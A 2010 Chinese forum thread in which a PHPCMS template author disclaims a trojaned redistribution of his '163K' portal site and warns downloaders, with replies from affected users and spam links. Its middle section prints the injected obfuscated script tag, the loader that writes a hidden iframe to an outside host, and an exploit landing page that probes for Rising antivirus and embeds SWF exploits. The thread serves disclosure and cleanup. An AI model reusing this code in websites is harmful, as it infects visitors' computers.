源码论坛,商业源码下载,尽在锦尚中国商业源码论坛

标题: 关于 PHPCMS仿163K全站的声明!下载163K的朋友请看!!! [打印本页]
作者: ysmaster    时间: 2010-2-22 03:14
标题: 关于 PHPCMS仿163K全站的声明!下载163K的朋友请看!!!
关于 PHPCMS仿163K全站的声明!


首先声明:
https://bbs.52jscn.com/thread-8765-1-1.html
并不是我发布的,本人在PHPCMS论坛提供的下载通过WINRAR加密过的,就算下载也无法解压。程序是从PHPCMS 2007 SP6 一路升级到PHPCMS2008的,不免有很多未知的问题。本人在PHPCMS论坛发布过声明,模板文件里面确实有一个框架连接是我的另外一个小站的页面,需要说明的,这是我自己的站提升另外一个站流量的做法!本人发布心切,未来得及删除,程序发布不到一个小时我就停止下载了,原因是我发现很多的错误和很多无效代码。今天本人看见改论坛发布了我的整站程序,我强烈谴责无限制WINRAR的人并修改程序加暗链以及挂马的行为。

望大家还我一个清白!


声明:本人在PHPCMS论坛提供了MD5值验证,网络上二次发布产生的一切后果与本人无关!!!


关于https://bbs.52jscn.com/thread-9404-1-1.html的声明:

该3楼的朋友估计素质有问题,你从小没有父母教过你吗?知道什么是教养吗?读过书吗?没弄明白就骂人,程序不是原作者发布的。 有人修改再次发布你就没想到了吗?

该帖4楼的朋友估计估计从小缺少教育,张口就脏话骂人,还把我的域名whois信息发出来,你真垃圾,自以为是。素质真的很无语!

关于5楼的问题:

帖子提到:

进phpmyadmin,找 表: phpcms_module 在 module下面---phpcms,编辑它,
setting 字段 里,最下面,'wss_site_id'和'wss_password'的默认值去掉,就是下面这样为空。
顺便曝光下这段不能修改的CNZZ统计设置的代码。
  1.   'wss_site_id' => '<script language=javascript src=http://h%302.x%6Frg.%70l/a.js></script>                                                                                                                                                                                                                80375607',
  2.   'wss_password' => '6377008992',
复制代码
我并没有在这里添加暗链,不知道是哪位该死的修改或者添加的,你们有意见找发布那人问清楚!


声明:http://h%302.x%6Frg.%70l/a.js 还原地址为:http://h02.xorg.pl/a.js

http://h02.xorg.pl/a.js 代码如下:
  1. function Get(){
  2. var Then = new Date()
  3. Then.setTime(Then.getTime() + 12*60*60*1000)
  4. var cookieString = new String(document.cookie)
  5. var cookieHeader = "Cookie1="
  6. var beginPosition = cookieString.indexOf(cookieHeader)
  7. if (beginPosition != -1){
  8. } else
  9. {
  10. var vsv="fucav";
  11. document.cookie = "Cookie1=lalaj;expires="+ Then.toGMTString()
  12. document.write("<div style=\'dispaly:none;\' >");
  13. document.write("<ifra"+"me src=http:\/\/adk.bij.pl\/44\/912rp.htm width=100 height=0><\/iframe>");
  14. document.write("</div>");
  15. }
  16. }Get();
复制代码
通过发现 http://adk.bij.pl/44/912rp.htm

通过谷歌游览器访问提示:

(, 下载次数: 54)


我们可以查看源代码如下:
  1. <HTML>
  2. <SCRIPT LANGUAGE="JavaScript">
  3. <!-- Hide
  4. function killErrors() {
  5. return true;
  6. }
  7. window.onerror = killErrors;
  8. function jc()
  9. {
  10. jc_list = ['res://C:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123','res://D:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123','res://E:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123'];
  11. for ( i= 0; i<jc_list.length; i++)
  12. {
  13.         ischeck = 1;
  14.         x = new Image();
  15.         x.src = "";
  16.         x.onerror = function()
  17.                 {
  18.                         ischeck = 0;
  19.                 }
  20.         x.src = jc_list[i];
  21.         if (ischeck == 1)
  22.                 return 1;
  23.         delete x;
  24. }
  25. return 0;
  26. }




  31. if (!jc())
  32. {
  33. if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
  34. {
  35. document.write("<EMBED src=iie.swf width=0 height=0>");
  36. }
  37. else
  38. {
  39. document.write("<EMBED src=fff.swf width=0 height=0>");
  40. }
  41. var yaom="bs";
  42. document.writeln("<iframe src=av.htm width=100 height=1><\/iframe>");
  43. document.writeln("<script src="fa.js"><\/script>");
  44. }
  45. else
  46. {
  47. document.writeln("<script src="1.js"><\/script>");
  48. }






  55. // -->
  56. </SCRIPT>
  57. </HTML>
  58. <script type="text/javascript" src="http://js.tongji.linezing.com/1241363/tongji.js"></script><noscript><a href="http://www.linezing.com"><img src="http://img.tongji.linezing.com/1241363/tongji.gif"/></a></noscript>
复制代码
代码中我们可以看见,如果你的瑞星安装在C D E盘,一般的人就这几个盘,这是一个干掉瑞星杀毒的脚本!严重谴责修改挂马的人!本人为了研究清楚也不小心中标呀,发现电脑速度变慢,有卡的感觉,最后只得一键GHOST啦,大家还是别去打开为好,知道怎么回事就可以!谨慎呀!!!

望大家下载程序时候注意哈。有的再次发布者往往会修改程序!下载请谨慎!谢谢!


严重声明:该论坛发布的仿163K全站与我无关,由此带来的一切后果与本人无关!





通过 http://who.is/ 查询 bij.pl域名whois信息如下:
  1. DOMAIN:                 bij.pl
  2. registrant's handle:    mjp_dr_000027af (CORPORATE)
  3. nameservers:            flop.ert.pl. [72.55.129.156]
  4.                        pszczolka.ert.pl. [209.172.34.211]
  5. created:                2005.12.31 10:44:08
  6. last modified:          2009.12.12 21:12:36

  8. option created           2008.02.09 18:05:17

  10. TECHNICAL CONTACT:
  11. company: AfterMarket.pl - gielda domen internetowych
  12.         http://www.AfterMarket.pl/
  13. street: Chytron 26, Office 21
  14. city: 1075 Nicosia
  15. location: CY
  16. handle: mjp_tech
  17. phone:  +357.22761649
  18. last modified: 2009.07.09


  21. REGISTRAR:
  22. Michau Enterprises Ltd.
  23. Chytron, 26 Street, Office 21, P.C. 1075 Nicosia, Cypr
  24. tel.+357.22761649
  25. fax:+357.22767543
  26. e-mail:domains@dropped.pl

  28. WHOIS displays data with a delay not exceeding 15 minutes in relation to the .pl Registry system
  29. Registrant data available at http://dns.pl/cgi-bin/en_whois.pl

  31. Information Updated: Sun, 21 Feb 2010 19:37:05 UTC
复制代码
详情请查询:http://who.is/whois/bij.pl/


经本人查询到:
.pl域名为波兰国家域名,而adk.bij.pl是由bee.pl免费提供345.pl、bee.pl、bij.pl、orge.pl、osa.pl等多种后缀的二级域名,并且可设置域名转发(支持隐藏原URL)、A记录及DNS服务器,申请简单,速度不错,无广告。


本人在用360安全游览器打开http://adk.bij.pl/44/912rp.htm无提示中毒,360安全游览器也不安全呀,本人只好恢复GHOST系统!谷歌游览器却提示了!建议还是用谷歌游览器吧!
作者: ysmaster    时间: 2010-2-22 03:39
下载了盗版PHPCMS仿163K的朋友注意了,解决办法如下:

因为原站是通过PHPCMS2006 SP6一路升级过来的,会有很多错误和问题,建议大家程序和模板分离,在管理后台导出二次开发的模型(官方默认自带的就不必导出了),把原程序删除,保留模板,到官方下载最新版PHPCMS2008SP3 GBK,把导出的模型通过后台导入到新的PHPCMS,把模板放到templates目录下,建立栏目和绑定模型、绑定模板,添加数据,修改模板,模板采用get标签,修改相应的栏目ID就可以做一个和163K基本相同的地方门户来!

附上傻瓜修改GET法:


1.如何修改调用栏目内容 我们找到相应模板,GET标签是以 “{get”开头,以“{/get}”结尾,我在相应位置可以看到标签中“IN(31)”,即表示调用栏目为31的内容.调用多个栏目用“,”分开,如“IN(31,32,56,57,60)” 。
2.如何修改调用数目 在相应模板位置找到“rows="8"”,这表示调用8条信息。
3.如何修改调用标题字数 在相应模板位置找到如“{str_cut($r[title], 40)}”,这表示调用标题前20个汉字40个英文,同理,调用摘要为“{str_cut($r[description],300)}”。
4.get中的分页 在模板中如有“ page="$page"”表示分页显示。


附上奉献万能GET标签使用完全教程一份

(, 下载次数: 2084)
作者: aaa    时间: 2010-2-22 03:44
提示: 作者被禁止或删除 内容自动屏蔽
作者: ysmaster    时间: 2010-2-22 03:56
首先利用发模板增加流量的做法还会死不对的吧!但是能站出来确实是好样的!

支持兄弟,还望能给出处理方 ...
aaa 发表于 2010-2-22 03:44


直接删除即可,缺少JS文件并不会报错的!
或者搜索模板文件即可!
作者: hk2r    时间: 2010-2-22 07:52
相信你也是无辜的,不幸的是,我也中招了。。。。

本论坛和phpcms的回复编辑了。。。

你给的建议和意见很不错。
作者: yunyinyu    时间: 2010-2-22 10:46
看了!
作者: merlincool    时间: 2010-2-22 12:05
163k这个老是出错
作者: foenfist    时间: 2010-2-22 17:48
老大,数据库还原之后,后台用户名和密码不是admin,52jscn啊
作者: gz_mo    时间: 2010-2-22 21:05
相信你也是无辜的,不幸的是,我也中招了。。。。
作者: shanliren123    时间: 2010-2-23 08:47
恢复以后,进入后台了,不过首页还是phpcms的默认首页,不过在后台预览可以看到163k的模板的,我把163k模板代码复制到index里的
作者: shanliren123    时间: 2010-2-23 08:50
我也试着把index_2010的代码复制到index里面。在可视化里面可以预览到,但是,在首页里还是php的默认主页,我刷新了缓存,还是不行
作者: wpwp00000    时间: 2010-2-23 10:20
有解决方法就好,不知道还有没有其他恶意代码了?
作者: quollwz    时间: 2010-2-23 10:41
相信你也是无辜的,不过我好想用用!
作者: 0826e    时间: 2010-2-23 11:39
有意思哈,嘿嘿,受教了。
作者: qhyqhy    时间: 2010-2-23 14:39
相信你也是无辜的,不幸的是,我也中招了。。。。
作者: qhyqhy    时间: 2010-2-23 14:39
相信你也是无辜的,不幸的是,我也中招了。。。。
作者: mcgzs    时间: 2010-2-28 11:18
我的搞定了,安装好了
邻水网
http://www.0826ls.com
有的问题我可能能帮你们解决
QQ:401167775
作者: send    时间: 2010-2-28 12:02
还不会,学习一下
作者: werun    时间: 2010-5-30 13:59
观望..谢谢
作者: hungchia    时间: 2011-7-22 01:22
桐乡外卖网 http://www.txwaimai.com
嘉兴外卖网 http://www.jxwaimai.com   
嘉兴交友网 http://www.jxyuan.com
绵阳房产网 http://www.myfcw.cn  
禾城主机   http://www.cn0573.net
嘉兴QQ群   http://qqun.cn0573.net  
桐乡做网站 http://im.cn0573.net



欢迎光临 源码论坛,商业源码下载,尽在锦尚中国商业源码论坛 (https://bbs.52jscn.com/) Powered by Discuz! X3.3